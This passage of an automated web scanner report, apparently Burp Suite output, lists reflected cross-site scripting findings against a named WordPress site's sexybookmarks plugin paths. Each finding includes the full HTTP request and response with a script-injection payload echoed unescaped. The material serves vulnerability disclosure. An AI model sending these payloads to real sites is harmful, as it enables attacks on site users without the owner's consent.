Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:18:28 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:18:28 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47416

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content98b6c\"><script>alert(1)</script>69a51346be6/plugins/sexybookmarks/css/comfeed.css/page/2" type="hidden" />
...[SNIP]...

1.151. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css/page/2 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/css/comfeed.css/page/2

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f981d"><script>alert(1)</script>66ebbffd62 was submitted in the REST URL parameter 2. This input was echoed as f981d\"><script>alert(1)</script>66ebbffd62 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginsf981d"><script>alert(1)</script>66ebbffd62/sexybookmarks/css/comfeed.css/page/2 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:19:00 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:19:01 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47413

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/pluginsf981d\"><script>alert(1)</script>66ebbffd62/sexybookmarks/css/comfeed.css/page/2" type="hidden" />
...[SNIP]...

1.152. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css/page/2 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/css/comfeed.css/page/2

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d392d"><script>alert(1)</script>5023067eea0 was submitted in the REST URL parameter 3. This input was echoed as d392d\"><script>alert(1)</script>5023067eea0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarksd392d"><script>alert(1)</script>5023067eea0/css/comfeed.css/page/2 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:19:33 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:19:34 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47416

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarksd392d\"><script>alert(1)</script>5023067eea0/css/comfeed.css/page/2" type="hidden" />
...[SNIP]...

1.153. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css/page/2 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/css/comfeed.css/page/2

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1357e"><script>alert(1)</script>5f4f3762d1b was submitted in the REST URL parameter 4. This input was echoed as 1357e\"><script>alert(1)</script>5f4f3762d1b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarks/css1357e"><script>alert(1)</script>5f4f3762d1b/comfeed.css/page/2 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:19:43 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:19:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47416

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css1357e\"><script>alert(1)</script>5f4f3762d1b/comfeed.css/page/2" type="hidden" />
...[SNIP]...

1.154. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css/page/2 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/css/comfeed.css/page/2

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30032"><script>alert(1)</script>7a12e41d703 was submitted in the REST URL parameter 5. This input was echoed as 30032\"><script>alert(1)</script>7a12e41d703 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarks/css/comfeed.css30032"><script>alert(1)</script>7a12e41d703/page/2 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:19:57 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:19:58 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47416

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css30032\"><script>alert(1)</script>7a12e41d703/page/2" type="hidden" />
...[SNIP]...

1.155. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css/page/2 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/css/comfeed.css/page/2

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8170"><script>alert(1)</script>c8241c08e36 was submitted in the REST URL parameter 6. This input was echoed as e8170\"><script>alert(1)</script>c8241c08e36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarks/css/comfeed.css/pagee8170"><script>alert(1)</script>c8241c08e36/2 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:20:20 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:20:21 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css/pagee8170\"><script>alert(1)</script>c8241c08e36/2" type="hidden" />
...[SNIP]...

1.156. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css/page/2 [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/css/comfeed.css/page/2

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c4f9"><script>alert(1)</script>fc715ef3f3a was submitted in the REST URL parameter 7. This input was echoed as 2c4f9\"><script>alert(1)</script>fc715ef3f3a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarks/css/comfeed.css/page/22c4f9"><script>alert(1)</script>fc715ef3f3a HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:20:28 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:20:29 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css/page/22c4f9\"><script>alert(1)</script>fc715ef3f3a" type="hidden" />
...[SNIP]...

1.157. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css/page/2 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/css/comfeed.css/page/2

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82fa0"><script>alert(1)</script>772b381c7a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 82fa0\"><script>alert(1)</script>772b381c7a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarks/css/comfeed.css/page/2?82fa0"><script>alert(1)</script>772b381c7a8=1 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:17:32 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Mon, 31 Jan 2011 20:17:33 GMT
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47454

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css/page/2?82fa0\"><script>alert(1)</script>772b381c7a8=1" type="hidden" />
...[SNIP]...

1.158. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-perf.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9403f"><script>alert(1)</script>03e6737652b was submitted in the REST URL parameter 1. This input was echoed as 9403f\"><script>alert(1)</script>03e6737652b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content9403f"><script>alert(1)</script>03e6737652b/plugins/sexybookmarks/js/shareaholic-perf.js HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:16:49 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:16:50 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content9403f\"><script>alert(1)</script>03e6737652b/plugins/sexybookmarks/js/shareaholic-perf.js" type="hidden" />
...[SNIP]...

1.159. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-perf.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbed5"><script>alert(1)</script>2ed32fd7284 was submitted in the REST URL parameter 2. This input was echoed as dbed5\"><script>alert(1)</script>2ed32fd7284 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginsdbed5"><script>alert(1)</script>2ed32fd7284/sexybookmarks/js/shareaholic-perf.js HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:17:21 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:17:21 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/pluginsdbed5\"><script>alert(1)</script>2ed32fd7284/sexybookmarks/js/shareaholic-perf.js" type="hidden" />
...[SNIP]...

1.160. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-perf.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 270ef"><script>alert(1)</script>6359b9f266f was submitted in the REST URL parameter 3. This input was echoed as 270ef\"><script>alert(1)</script>6359b9f266f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarks270ef"><script>alert(1)</script>6359b9f266f/js/shareaholic-perf.js HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:17:45 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:17:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks270ef\"><script>alert(1)</script>6359b9f266f/js/shareaholic-perf.js" type="hidden" />
...[SNIP]...

1.161. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-perf.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d48cf"><script>alert(1)</script>a0e85372bab was submitted in the REST URL parameter 4. This input was echoed as d48cf\"><script>alert(1)</script>a0e85372bab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarks/jsd48cf"><script>alert(1)</script>a0e85372bab/shareaholic-perf.js HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:18:16 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:18:17 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks/jsd48cf\"><script>alert(1)</script>a0e85372bab/shareaholic-perf.js" type="hidden" />
...[SNIP]...

1.162. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-perf.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bb79"><script>alert(1)</script>8b65169f2a0 was submitted in the REST URL parameter 5. This input was echoed as 6bb79\"><script>alert(1)</script>8b65169f2a0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarks/js/shareaholic-perf.js6bb79"><script>alert(1)</script>8b65169f2a0 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:18:48 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:18:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js6bb79\"><script>alert(1)</script>8b65169f2a0" type="hidden" />
...[SNIP]...

1.163. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-perf.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-perf.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26cbc"><script>alert(1)</script>8d0b33eac8c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 26cbc\"><script>alert(1)</script>8d0b33eac8c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarks/js/shareaholic-perf.js?26cbc"><script>alert(1)</script>8d0b33eac8c=1 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
